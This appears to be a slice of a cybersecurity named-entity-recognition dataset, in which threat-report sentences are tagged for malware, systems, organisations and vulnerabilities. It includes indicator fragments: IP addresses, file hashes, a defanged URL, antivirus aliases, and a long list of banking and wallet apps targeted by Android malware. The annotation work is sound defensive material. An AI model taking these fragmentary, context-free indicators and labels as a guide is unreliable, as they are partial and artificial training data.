"spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000754", "source": "cyner2_valid"}} {"text": "] ml/mms3/download_3.php IP addresses 78.46.201.36 88.99.170.84 88.99.227.26 94.130.106.117 88.99.174.200 88.99.189.31 Hash 369fcf48c1eb982088c22f86672add10cae967af82613bee6fb8a3669603dc48 b2d4fcf03c7a8bf135fbd3073bea450e2e6661ad8ef2ab2058a3c04f81fc3f3e 8f5d5d8419a4832d175a6028c9e7d445f1e99fdc12170db257df79831c69ae4e a5ebcdaf5fd10ec9de85d62e48cc97a4e08c699a7ebdeab0351b86ab1370557d 84578b9b2c3cc1c7bbfcf4038a6c76ae91dfc82eef5e4c6815627eaf6b4ae6f6 89eecd91dff4bf42bebbf3aa85aa512ddf661d3e9de4c91196c98f4fc325a018 9edee3f3d539e3ade61ac2956a6900d93ba3b535b6a76b3a9ee81e2251e25c61 0e48e5dbc3a60910c1460b382d28e087a580f38f57d3f82d4564309346069bd1 c113cdd2a5e164dcba157fc4e6026495a1cfbcb0b1a8bf3e38e7eddbb316e01f 1819d2546d9c9580193827c0d2f5aad7e7f2856f7d5e6d40fd739b6cecdb1e9e b213c1de737b72f8dd7185186a246277951b651c64812692da0b9fdf1be5bf15 453e7827e943cdda9121948f3f4a68d6289d09777538f92389ca56f6e6de03f0 0246dd4acd9f64ff1508131c57a7b29e995e102c74477d5624e1271700ecb0e2 88034e0eddfdb6297670d28ed810aef87679e9492e9b3e782cc14d9d1a55db84 e08f08f4fa75609731c6dd597dc55c8f95dbdd5725a6a90a9f80134832a07f2e 01c5b637f283697350ca361f241416303ab6123da4c6726a6555ac36cb654b5c 1fb06666befd581019af509951320c7e8535e5b38ad058069f4979e9a21c7e1c 6bdfb79f813448b7f1b4f4dbe6a45d1938f3039c93ecf80318cedd1090f7e341 ADDITIONAL INFORMATION Packages monitored pin.secret.access com.chase.sig.android com.morganstanley.clientmobile.prod com.wf.wellsfargomobile com.citi.citimobile com.konylabs.capitalone com.infonow.bofa com.htsu.hsbcpersonalbanking com.usaa.mobile.android.usaa com.schwab.mobile com.americanexpress.android.acctsvcs.us com.pnc.ecommerce.mobile com.regions.mobbanking com.clairmail.fth com.grppl.android.shell.BOS com.tdbank com.huntington.m com.citizensbank.androidapp com.usbank.mobilebanking com.ally.MobileBanking com.key.android com.unionbank.ecommerce.mobile.android 
com.mfoundry.mb.android.mb_BMOH071025661 com.bbt.cmol com.sovereign.santander com.mtb.mbanking.sc.retail.prod com.fi9293.godough com.commbank.netbank org.westpac.bank org.stgeorge.bank au.com.nab.mobile au.com.bankwest.mobile au.com.ingdirect.android org.banksa.bank com.anz.android com.anz.android.gomoney com.citibank.mobile.au org.bom.bank com.latuabancaperandroid com.comarch.mobile com.jpm.sig.android com.konylabs.cbplpat by.belinvestbank no.apps.dnbnor com.arkea.phonegap com.alseda.bpssberbank com.belveb.belvebmobile com.finanteq.finance.ca pl.eurobank pl.eurobank2 pl.noblebank.mobile com.getingroup.mobilebanking hr.asseco.android.mtoken.getin pl.getinleasing.mobile com.icp.ikasa.getinon eu.eleader.mobilebanking.pekao softax.pekao.powerpay softax.pekao.mpos dk.jyskebank.mobilbank com.starfinanz.smob.android.bwmobilbanking eu.newfrontier.iBanking.mobile.SOG.Retail com.accessbank.accessbankapp com.sbi.SBIFreedomPlus com.zenithBank.eazymoney net.cts.android.centralbank com.f1soft.nmbmobilebanking.activities.main com.lb.smartpay com.mbmobile com.db.mobilebanking com.botw.mobilebanking com.fg.wallet com.sbi.SBISecure com.icsfs.safwa com.interswitchng.www com.dhanlaxmi.dhansmart.mtc com.icomvision.bsc.tbc hr.asseco.android.jimba.cecro com.vanso.gtbankapp com.fss.pnbpsp com.mfino.sterling cy.com.netinfo.netteller.boc ge.mobility.basisbank com.snapwork.IDBI com.lcode.apgvb com.fact.jib mn.egolomt.bank com.pnbrewardz com.firstbank.firstmobile wit.android.bcpBankingApp.millenniumPL com.grppl.android.shell.halifax com.revolut.revolut de.commerzbanking.mobil uk.co.santander.santanderUK se.nordea.mobilebank com.snapwork.hdfc com.csam.icici.bank.imobile com.msf.kbank.mobile com.bmm.mobilebankingapp net.bnpparibas.mescomptes fr.banquepopulaire.cyberplus com.caisseepargne.android.mobilebanking com.palatine.android.mobilebanking.prod com.ocito.cdn.activity.creditdunord com.fullsix.android.labanquepostale.accountaccess mobi.societegenerale.mobile.lappli 
com.db.businessline.cardapp com.skh.android.mbanking com.ifs.banking.fiid1491 de.dkb.portalapp pl.pkobp.ipkobiznes pl.com.suntech.mobileconnect eu.eleader.mobilebanking.pekao.firm pl.mbank pl.upaid.nfcwallet.mbank eu.eleader.mobilebanking.bre pl.asseco.mpromak.android.app.bre pl.asseco.mpromak.android.app.bre.hd pl.mbank.mnews eu.eleader.mobilebanking.raiffeisen pl.raiffeisen.nfc hr.asseco.android.jimba.rmb com.advantage.RaiffeisenBank pl.bzwbk.ibiznes24 pl.bzwbk.bzwbk24 pl.bzwbk.mobile.tab.bzwbk24 com.comarch.mobile.investment com.android.vending com.snapchat.android jp.naver.line.android com.viber.voip com.gettaxi.android com.whatsapp com.tencent.mm com.skype.raider com.ubercab com.paypal.android.p2pmobile com.circle.android com.coinbase.android com.walmart.android com.bestbuy.android com.ebay.gumtree.au com.ebay.mobile com.westernunion.android.mtapp com.moneybookers.skrillpayments com.gyft.android com.amazon.mShop.android.shopping com.comarch.mobile.banking.bgzbnpparibas.biznes pl.bnpbgzparibas.firmapp com.finanteq.finance.bgz pl.upaid.bgzbnpp de.postbank.finanzassistent pl.bph de.comdirect.android com.starfinanz.smob.android.sfinanzstatus de.sdvrz.ihb.mobile.app pl.ing.mojeing com.ing.mobile pl.ing.ingksiegowosc com.comarch.security.mobilebanking com.comarch.mobile.investment.ing com.ingcb.mobile.cbportal de.buhl.finanzblick pl.pkobp.iko pl.ipko.mobile pl.inteligo.mobile de.number26.android pl.millennium.corpApp eu.transfer24.app pl.aliorbank.aib pl.corelogic.mtoken alior.bankingapp.android com.ferratumbank.mobilebank com.swmind.vcc.android.bzwbk_mobile.app de.schildbach.wallet piuk.blockchain.android com.bitcoin.mwallet com.btcontract.wallet com.bitpay.wallet com.bitpay.copay btc.org.freewallet.app org.electrum.electrum com.xapo com.airbitz com.kibou.bitcoin com.qcan.mobile.bitcoin.wallet me.cryptopay.android com.bitcoin.wallet lt.spectrofinance.spectrocoin.android.wallet com.kryptokit.jaxx com.wirex bcn.org.freewallet.app 
com.hashengineering.bitcoincash.wallet bcc.org.freewallet.app com.coinspace.app btg.org.freewallet.app net.bither co.edgesecure.app com.arcbit.arcbit distributedlab.wallet de.schildbach.wallet_test com.aegiswallet com.plutus.wallet com.coincorner.app.crypt eth.org.freewallet.app secret.access secret.pattern RuMMS : The Latest Family of Android Malware Attacking Users in Russia Via SMS Phishing April 26 , 2016 Introduction Recently we observed an Android malware family being used to attack users in Russia .", "spans": {"Malware: RuMMS": [[6110, 6115]], "System: Android": [[6139, 6146]], "Malware: Android": [[6251, 6258]]}, "info": {"id": "cyner2_valid_000755", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.DropperFraudropK.Trojan Trojan.Orbus.C3 Win32.Trojan.WisdomEyes.16070401.9500.9996 Backdoor.Trojan BKDR_NANOCORE.SMD Win.Trojan.Nanocore-5 MSIL.Backdoor.Nancat.A Trojan.Win32.Dwn.edxxmu Backdoor.MSIL.Noancooe.JDE Trojan.Nanocore.23 BKDR_NANOCORE.SMD BehavesLike.Win32.PUPXBZ.dc Trojan.MSIL.NanoCore HackTool:MSIL/Noancooe.B Win-Trojan/Nanocore.Exp Backdoor.NanoCore Trojan.Msil MSIL/NanoCore.E Win32/Backdoor.dfa", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000756", "source": "cyner2_valid"}} {"text": "Dell SecureWorks Counter Threat UnitTM CTU researchers have analyzed multiple variants of this malware, which stealthily steals information from compromised systems.", "spans": {"Organization: Dell SecureWorks Counter Threat UnitTM CTU researchers": [[0, 54]], "Malware: malware,": [[95, 103]], "System: compromised systems.": [[145, 165]]}, "info": {"id": "cyner2_valid_000757", "source": "cyner2_valid"}} {"text": "The social engineering message includes a link that leads to a fake version of a popular app , using names like Runtastic , WhatsApp or Netflix .", "spans": {"System: Runtastic": [[112, 121]], "System: WhatsApp": [[124, 132]], "System: Netflix": [[136, 143]]}, "info": {"id": "cyner2_valid_000758", "source": 
"cyner2_valid"}} {"text": "A backdoor also known as: W32.CazakoDSC.Trojan Trojan.Injector Virus.W32.Virus!c Win32.Trojan.WisdomEyes.16070401.9500.9948 Trojan.Win32.IRCbot.basf Trojan.Win32.Inject.eusedv Trojan.Inject2.62537 BehavesLike.Win32.AdwareSearchProtect.mc Trojan.Win32.Injector W32/Trojan.UPSL-6537 TR/Injector.xryub Trojan.Win32.IRCbot.basf Backdoor:Win32/Kirts.A Trojan.IRCbot Trj/CI.A NSIS/Injector.WP Win32.Trojan.Ircbot.Htls Trojan.Injector!MdP75PI8ynA W32/Injector.DTAG!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000759", "source": "cyner2_valid"}} {"text": "Why would a regular game downloaded from the official Google Play store come with another application named systemdata?", "spans": {"System: game": [[20, 24]], "System: Google Play store": [[54, 71]], "System: application": [[90, 101]]}, "info": {"id": "cyner2_valid_000760", "source": "cyner2_valid"}} {"text": "For example , the actors behind FrozenCell used a spoofed app called Tawjihi 2016 , which Jordanian or Palestinian students would ordinarily use during their general secondary examination .", "spans": {"Malware: FrozenCell": [[32, 42]]}, "info": {"id": "cyner2_valid_000761", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.DownLoader13.29563 TrojanProxy:Win32/Wonknod.B Win32/Trojan.Downloader.ac3", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000762", "source": "cyner2_valid"}} {"text": "Another interesting technique leveraged by this malware was the use of DNS queries as a data exfiltration channel.", "spans": {"Malware: malware": [[48, 55]], "System: DNS queries": [[71, 82]]}, "info": {"id": "cyner2_valid_000763", "source": "cyner2_valid"}} {"text": "One of these periods is currently ongoing.", "spans": {}, "info": {"id": "cyner2_valid_000764", "source": "cyner2_valid"}} {"text": "A backdoor also known as: HW32.Packed.8C57 Trojan/W32.TDSS.32768.GF Packed.Win32.TDSS!O Worm.Pondfull.B6 Worm.AutoRun.Win32.102264 
Trojan/TDSS.c Trojan.Zusy.D1A4C7 Win32.Worm.Autorun.bm Trojan.Zeroaccess WORM_STASER.SM Worm.Win32.Pondfull.a Trojan.Win32.TDSS.bdcsyv Backdoor.Win32.Xtreme.32768 Trojan.Inject1.14023 WORM_STASER.SM BehavesLike.Win32.Packed.nh Packed.Tdss.bsct W32.Worm.SM Trojan[Packed]/Win32.Tdss Win32.Troj.TDSS.c.kcloud Worm:Win32/Pondfull.B Packer.W32.TDSS.tn6f Worm.Win32.Pondfull.a Trojan/Win32.Tdss.R69024 Worm.Pondfull Rootkit.TDSS Worm.AutoRun!kPqnRl2e8mk Packer.Win32.Tdss", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000765", "source": "cyner2_valid"}} {"text": "Emerging from the bowels of Hacking Team data dump was a Flash 0-day exploit CVE-2015-5119 that was just patched today by Adobe as covered in APSB15-16.", "spans": {"Organization: Hacking Team": [[28, 40]], "Malware: Flash 0-day exploit": [[57, 76]], "Organization: Adobe": [[122, 127]], "Vulnerability: APSB15-16.": [[142, 152]]}, "info": {"id": "cyner2_valid_000766", "source": "cyner2_valid"}} {"text": "This email was seen around 10/9/2014.", "spans": {}, "info": {"id": "cyner2_valid_000767", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojanpws.Msil Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Stealer.exqnls Trojan.Win32.Z.Rasftuby.1107617 Msil.Trojan-qqpass.Qqrob.Wlph Trojan.PWS.Stealer.1856 BehavesLike.Win32.Backdoor.tc W32/Trojan.PPNW-3117 TR/Rasftuby.cmyvl Trj/CI.A Win32/Trojan.e53", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000768", "source": "cyner2_valid"}} {"text": "In our initial analysis and current activity tracking that began in November 2022, we observed Prometei deploying Windows-based tools and malware and other Linux versions observed by security researchers.", "spans": {"System: Windows-based": [[114, 127]], "Malware: tools": [[128, 133]], "Malware: malware": [[138, 145]], "System: Linux versions": [[156, 170]], "Organization: security researchers.": [[183, 204]]}, "info": {"id": "cyner2_valid_000769", "source": 
"cyner2_valid"}} {"text": "Additionally, it also contains modules to target some popular social media apps.", "spans": {"System: social media apps.": [[62, 80]]}, "info": {"id": "cyner2_valid_000770", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.FamVT.QQPassACTTc.Worm Trojanpws.Makuha.18357 Trojan/QQPass.ova Win.Trojan.Pwstealer-225 Trojan-PSW.Win32.Makuha.bxs Trojan.Win32.Crypted.drvldd TrojWare.Win32.Rogue.SNST Trojan.PWS.Qqpass.11341 Trojan.QQPass.Win32.25524 Trojan/PSW.QQPass.qqe W32.Makuha Trojan[PSW]/Win32.Makuha Trojan-PSW.Win32.Makuha.bxs PWS:Win32/Makuha.A Trojan/Win32.Makuha.R152145 TrojanPSW.Makuha Trojan.PWS.Makuha! Trojan.Win32.PSW Trojan.PSW.Win32.GameOnline.GD", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000771", "source": "cyner2_valid"}} {"text": "Once the victim enters their account information on the landing page , the phishing attack then requests that the user log in with their email address and phone number .", "spans": {}, "info": {"id": "cyner2_valid_000772", "source": "cyner2_valid"}} {"text": "The link leads to a phishing page that asks for banking login credentials or an account number and PIN .", "spans": {}, "info": {"id": "cyner2_valid_000773", "source": "cyner2_valid"}} {"text": "So we decided to write our own plugin code using IDA Python .", "spans": {"System: Python": [[53, 59]]}, "info": {"id": "cyner2_valid_000774", "source": "cyner2_valid"}} {"text": "Both the tools and targets of Moonlight are reminiscent of Gaza Hacker Team, a group of attackers that are said to be politically aligned to the Hamas.", "spans": {"Malware: tools": [[9, 14]], "Organization: the Hamas.": [[141, 151]]}, "info": {"id": "cyner2_valid_000775", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9975 Trojan.Click3.25302 Trojan.Trojan.Liev.1 Trojan:Win32/Leivion.A Trojan/Win32.Skeeyah.C2313337 Trojan.Win32.Swrort", "spans": {"Malware: backdoor": [[2, 10]]}, 
"info": {"id": "cyner2_valid_000776", "source": "cyner2_valid"}} {"text": "After achieving root access the app tries to replace the framework.jar file on the system partition .", "spans": {}, "info": {"id": "cyner2_valid_000777", "source": "cyner2_valid"}} {"text": "TimerTask Figure 6 : The timer task .", "spans": {}, "info": {"id": "cyner2_valid_000778", "source": "cyner2_valid"}} {"text": "These exploits still plague many devices today because security patches that fix them may not be available for some versions of Android , or the patches were never installed by the user .", "spans": {"System: Android": [[128, 135]]}, "info": {"id": "cyner2_valid_000779", "source": "cyner2_valid"}} {"text": "However , the actual timeline of the creation of different variants is unclear .", "spans": {}, "info": {"id": "cyner2_valid_000780", "source": "cyner2_valid"}} {"text": "After the review , the process is the same as above .", "spans": {}, "info": {"id": "cyner2_valid_000782", "source": "cyner2_valid"}} {"text": "Unlike previous campaigns from this actor, the flyer does not contain an Office exploit or a 0-day, it simply contains a malicious Visual Basic for Applications VBA macro.", "spans": {"Vulnerability: an Office exploit": [[70, 87]], "Vulnerability: a 0-day,": [[91, 99]], "Malware: malicious Visual Basic for Applications VBA macro.": [[121, 171]]}, "info": {"id": "cyner2_valid_000783", "source": "cyner2_valid"}} {"text": "In recent months, a new trend seems to be emerging: targeted attacks where ransomware is deployed by threat actors after successfully gaining unauthorized access to an organization's network.", "spans": {"Organization: trend": [[24, 29]], "Malware: ransomware": [[75, 85]], "Organization: organization's network.": [[168, 191]]}, "info": {"id": "cyner2_valid_000784", "source": "cyner2_valid"}} {"text": "] com ) that prompts the user to install a malicious iOS configuration profile to solve a network issue preventing the site to load .", "spans": 
{"System: iOS": [[53, 56]]}, "info": {"id": "cyner2_valid_000785", "source": "cyner2_valid"}} {"text": ") are filled in and verified .", "spans": {}, "info": {"id": "cyner2_valid_000786", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.ADH Win32.HEURCrypted Trojan.DownLoader7.23367 W32/Trojan.DHSC-4693 Virus.Win32.Heur.d Trojan.ADH Trojan.Win32.Spy Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000787", "source": "cyner2_valid"}} {"text": "It controls each and every functionality based on the commands sent by the command and control ( C & C ) server .", "spans": {}, "info": {"id": "cyner2_valid_000788", "source": "cyner2_valid"}} {"text": "Mobile Threat Prevention identified the threat automatically by detecting exploitation attempts while examining the malware in the MTP emulators.", "spans": {"Organization: Mobile Threat Prevention": [[0, 24]], "Malware: threat": [[40, 46]], "Vulnerability: exploitation": [[74, 86]], "Malware: malware": [[116, 123]], "System: the MTP emulators.": [[127, 145]]}, "info": {"id": "cyner2_valid_000789", "source": "cyner2_valid"}} {"text": "A backdoor also known as: TR/Spy.14336.115", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000790", "source": "cyner2_valid"}} {"text": "Linkages between older RATs are explored later in this blog.", "spans": {"Malware: RATs": [[23, 27]]}, "info": {"id": "cyner2_valid_000791", "source": "cyner2_valid"}} {"text": "Discovered for the first time in Mexico back in 2013, Ploutus enabled criminals to empty ATMs using either an external keyboard attached to the machine or via SMS message, a technique that had never been seen before.", "spans": {"Malware: Ploutus": [[54, 61]], "Organization: ATMs": [[89, 93]], "System: machine": [[144, 151]]}, "info": {"id": "cyner2_valid_000792", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win.Downloader.Small-2630 Virus.Win32.Patched.boked Trojan-Downloader.Win32.Tiny.br 
Exploit:Win32/Senglot.V", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000793", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Ransom.Peglegmorb.A13 W32/Trojan.QWSS-6329 Trojan.KillMBR.Win32.86 Trojan.Win32.KillMBR Trojan.DiskWriter.ab Trojan/Win32.DiskWriter Trojan:Win32/Peglegmorb.A Trojan/Win32.Peglegmorb.R185808 Trojan.DiskWriter Trj/CI.A Win32/KillMBR.NBQ W32/DiskKill.B!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000794", "source": "cyner2_valid"}} {"text": "A backdoor also known as: TROJ_TPROXY.SMIA Win32.Trojan.WisdomEyes.16070401.9500.9994 TROJ_TPROXY.SMIA Backdoor.Win32.TinyProxy.~HT Trojan.Click.21803 Backdoor.Win32.TinyProxy TR/TinyProxy.2 Trojan.Graftor.D2C80D TrojanProxy:Win32/Tinxy.C", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000795", "source": "cyner2_valid"}} {"text": "In one sample , no SMS-related code appears in the DEX file , but there is a native method registered .", "spans": {}, "info": {"id": "cyner2_valid_000796", "source": "cyner2_valid"}} {"text": "At this point the malware extracts and decrypts a stub DLL from its own resources ( ID 101 ) .", "spans": {}, "info": {"id": "cyner2_valid_000797", "source": "cyner2_valid"}} {"text": "However , the underlying code can be quite different in that various obfuscation mechanisms were adopted to evade detection by anti-virus tools .", "spans": {}, "info": {"id": "cyner2_valid_000798", "source": "cyner2_valid"}} {"text": "This mining Trojan horse mainly uses SSH weak password brute force cracking to attack the Linux platform.", "spans": {"Malware: Trojan horse": [[12, 24]], "System: the Linux platform.": [[86, 105]]}, "info": {"id": "cyner2_valid_000799", "source": "cyner2_valid"}} {"text": "The adversaries behind these attacks continued to target Russia and other Russian speaking nations using similar exploits and attack vectors.", "spans": {"Organization: Russian speaking nations": [[74, 
98]], "Vulnerability: exploits": [[113, 121]], "Vulnerability: attack vectors.": [[126, 141]]}, "info": {"id": "cyner2_valid_000800", "source": "cyner2_valid"}} {"text": "This multi-stage attack piqued the interest of those working in the cloud security industry, as it involved a complex exploitation chain – including credential theft and lateral movement between AWS services.", "spans": {"Organization: the cloud security industry,": [[64, 92]], "Vulnerability: complex exploitation chain": [[110, 136]], "System: AWS services.": [[195, 208]]}, "info": {"id": "cyner2_valid_000801", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.NJRat.FC.51 WORM_NJRAT.SMA1 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Revetrat WORM_NJRAT.SMA1 Trojan.Win32.Dwn.efydxt Troj.Dropper.W32!c BackDoor.RevetRat.2 BehavesLike.Win32.Trojan.mm TR/Downloader.srns Backdoor:MSIL/NJRat.A!bit Trojan.Zusy.D31A73 Backdoor.NJRat Trj/GdSda.A Win32/Trojan.Dropper.66f", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000802", "source": "cyner2_valid"}} {"text": "These repackaged , malware-laden apps are neither on Google Play nor popular third-party app marketplaces , and we only saw the website hosting the malicious apps being promoted on social media when we followed GolfSpy ’ s trail .", "spans": {"System: Google Play": [[53, 64]], "Malware: GolfSpy": [[211, 218]]}, "info": {"id": "cyner2_valid_000803", "source": "cyner2_valid"}} {"text": "The background service uses the reflection technique ( a feature that allows the inspection and modification of Java-based programs ’ internal properties ) to invoke the method com.Loader.start in the payload .", "spans": {}, "info": {"id": "cyner2_valid_000804", "source": "cyner2_valid"}} {"text": "Hacking Team Spying Tool Listens to Calls By : Trend Micro July 21 , 2015 Following news that iOS devices are at risk of spyware related to the Hacking Team , the saga continues into the Android sphere .", "spans": 
{"Organization: Hacking Team": [[0, 12], [144, 156]], "Organization: Trend Micro": [[47, 58]], "System: iOS": [[94, 97]], "System: Android": [[187, 194]]}, "info": {"id": "cyner2_valid_000805", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan-Dropper.Win32.Daws!O Dropper.Daws.Win32.7511 Trojan.Symmi.D32C8 Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan-Dropper.Win32.Daws.axaz Trojan.Win32.Daws.csyqhx Trojan.Win32.A.Scar.53248.O BehavesLike.Win32.Virut.wt Trojan/Scar.asif Trojan/Win32.Scar Trojan:Win32/Yalogger.C Trojan-Dropper.Win32.Daws.axaz HEUR/Fakon.mwf TrojanDropper.Daws Trojan.Dropper Win32.Trojan-dropper.Daws.Dypc Trojan.Win32.Yalogger W32/ZLob.BBDE!tr.spy", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000806", "source": "cyner2_valid"}} {"text": "Virus/Win32.Virut.ce Win32.Virut.cr.61440 Virus.Win32.Virut.ce TrojanDownloader:Win32/Gasonen.A HEUR/Fakon.mwf W32/Sality.AO Worm.Win32.AutoIt W32/Virut.CE", "spans": {}, "info": {"id": "cyner2_valid_000807", "source": "cyner2_valid"}} {"text": "] com hxxp : //mailsa-wqe [ .", "spans": {}, "info": {"id": "cyner2_valid_000808", "source": "cyner2_valid"}} {"text": "Citizen Labs first discovered the operation in late 2015 when a member of the Syrian opposition spotted a suspicious e-mail containing a PowerPoint slideshow.", "spans": {"Organization: Citizen Labs": [[0, 12]], "Organization: member": [[64, 70]], "Organization: the Syrian opposition": [[74, 95]]}, "info": {"id": "cyner2_valid_000810", "source": "cyner2_valid"}} {"text": "As cybercriminals start to focus on pulling off attacks without leaving a trace, fileless malware, such as the recent SOREBRECT ransomware, will become a more common attack method.", "spans": {"Malware: fileless malware,": [[81, 98]], "Malware: SOREBRECT ransomware,": [[118, 139]]}, "info": {"id": "cyner2_valid_000811", "source": "cyner2_valid"}} {"text": "A backdoor also known as: HW32.Packed.F138 Backdoor.Bot.31879 W32.Virut.kYZj 
Backdoor.Bot.D7C87 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32.IRCBot Backdoor.Bot.31879 Backdoor.Bot.31879 Backdoor.Bot.31879 Backdoor.Win32.Bot.318790 BehavesLike.Win32.RAHack.fc Backdoor:Win32/Poebot.AD Backdoor.Bot.31879", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000813", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Troj.Dropper.W32.Injector.m7mC Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Backdoor2.HVBE Win32/Tnega.AUXS Trojan-Downloader.MSIL.Injector.a Trojan.Win32.Inject.dpvshl W32/Backdoor.TCSC-2370 TrojanDownloader.MSIL.aef TR/AD.Rekrum.dmsmv Trojan-Downloader.MSIL.Injector.a TrojanDownloader:MSIL/Rekrum.A Trj/CI.A Msil.Trojan-downloader.Injector.Pcjc", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000814", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Worm.Krol.A8 Backdoor.Klon.Win32.1007 Trojan/Canbis.c HT_KROL_GF150058.UVPM Win32.Virus.Probably.a Win32/Tnega.bBHGbLB TROJ_DELFLOADER_0000005.TOMA Win.Trojan.Smtp-1 Trojan.Win32.Delphi.bdxtvz Win32.HLLM.Belarus BehavesLike.Win32.HLLP.vm Trojan/Cosmu.t Trojan/Win32.Unknown Worm:Win32/Krol.A Trojan/Win32.Xema.C92285 Trojan.DL.Delphi!kp3dmHWwMdk P2P-Worm.Win32.Delf W32/DelpDldr.C W32/Knase.C", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000816", "source": "cyner2_valid"}} {"text": "After Check Point notified Google about this threat , the apps were swiftly removed from the Play store .", "spans": {"Organization: Check Point": [[6, 17]], "Organization: Google": [[27, 33]], "System: Play store": [[93, 103]]}, "info": {"id": "cyner2_valid_000817", "source": "cyner2_valid"}} {"text": "We discovered 561MB of exfiltrated data from 24 compromised Android devices while investigating this threat .", "spans": {"System: Android": [[60, 67]]}, "info": {"id": "cyner2_valid_000818", "source": "cyner2_valid"}} {"text": "Distribution via waterhole attacks in Ukrainian news websites one case known", 
"spans": {"Organization: Ukrainian news websites": [[38, 61]]}, "info": {"id": "cyner2_valid_000819", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.TaraneD.Trojan Trojan-Downloader.Win32.VB!O TrojanDownloader.VB.PX3 Downloader.VB.Win32.27399 Trojan/Downloader.VB.aint Win32.Trojan.VB.aq TScope.Trojan.VB Win32/VB.BHW TROJ_STARTPAGE_00001dd.TOMA Trojan-Downloader.Win32.VB.ibwr Trojan.Win32.VB.dydtmu Trojan.Win32.A.Downloader.36881.A Troj.Downloader.W32.VB.lkln TrojWare.Win32.VB.aicx Trojan.DownLoad2.34275 Trojan.Win32.VB W32/Startpage.BKY TrojanDownloader.VB.dbkn TR/Dldr.VB.PX.17 Trojan[Downloader]/Win32.VB Trojan.Buzy.D785 Trojan-Downloader.Win32.VB.ibwr Downloader/Win32.VB.R22631 Trojan.Win32.VB.py Trojan.DL.VB!aE+g0wTEfFE Trojan.Downloader.Win32.VBCode.M", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000820", "source": "cyner2_valid"}} {"text": "The targeting of this individual suggests the actors are interested in breaching the French Ministry of Foreign Affairs itself or gaining insights into relations between France and Taiwan.", "spans": {"Organization: French Ministry of Foreign Affairs": [[85, 119]]}, "info": {"id": "cyner2_valid_000821", "source": "cyner2_valid"}} {"text": "Dropping Cluster Bombs RCSAndroid is a threat that works like a cluster bomb in that it deploys multiple dangerous exploits and uses various techniques to easily infect Android devices .", "spans": {"Malware: RCSAndroid": [[23, 33]], "System: Android": [[169, 176]]}, "info": {"id": "cyner2_valid_000822", "source": "cyner2_valid"}} {"text": "The malware was able to perform overlay attacks and become the default SMS app through the abuse of the Accessibility Service .", "spans": {}, "info": {"id": "cyner2_valid_000824", "source": "cyner2_valid"}} {"text": "Alberto Nisman, the Argentine prosecutor known for doggedly investigating a 1994 Buenos Aires bombing, was targeted by invasive spy software downloaded onto his cellular phone shortly before 
his mysterious death.", "spans": {"Organization: Alberto Nisman,": [[0, 15]], "Organization: Argentine prosecutor": [[20, 40]], "Malware: spy software": [[128, 140]], "System: cellular phone": [[161, 175]]}, "info": {"id": "cyner2_valid_000825", "source": "cyner2_valid"}} {"text": "About eight weeks ago, a critical RCE vulnerability present in every Samba version since 2010 was reported and patched.", "spans": {"Vulnerability: critical RCE vulnerability": [[25, 51]], "System: Samba": [[69, 74]]}, "info": {"id": "cyner2_valid_000826", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan-Dropper.Win32!O TrojanDropper.EESbinder Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Risk.OUTE-0559 Win32/TrojanRunner.EES.10 Trojan-Dropper.Win32.EESbinder Trojan.Win32.Delf.dpvuse Dropper.EESbinder.20992 Troj.Dropper.W32.EESbinder.lrGz Win32.Trojan-dropper.Eesbinder.Pgcw Trojan.MulDrop.8071 Dropper.EESbinder.Win32.26 BehavesLike.Win32.Backdoor.cm Trojan-Downloader.Win32.Delf W32/Dropper.LHW TrojanDropper.EESbinder TR/EESBinder.3 Win32.Troj.EESbinder.kcloud Trojan-Dropper.Win32.EESbinder Dropper/EESBinder.20992 TrojanDropper.EESbinder Win32/TrojanDropper.EESbinder.10 Trojan.DR.EESbinder!Zc2Oat/eh7Y W32/EESbinder.A!tr.dr Win32/Trojan.38e", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000827", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Hacktool.Seasharpee Trojan.PHP.Twoface.c ASP.S.WebShell.10418.A ASP.Shell.12 Troj.Php.Twoface!c Trojan.PHP.Twoface.c Backdoor:ASP/Seasharpee.A 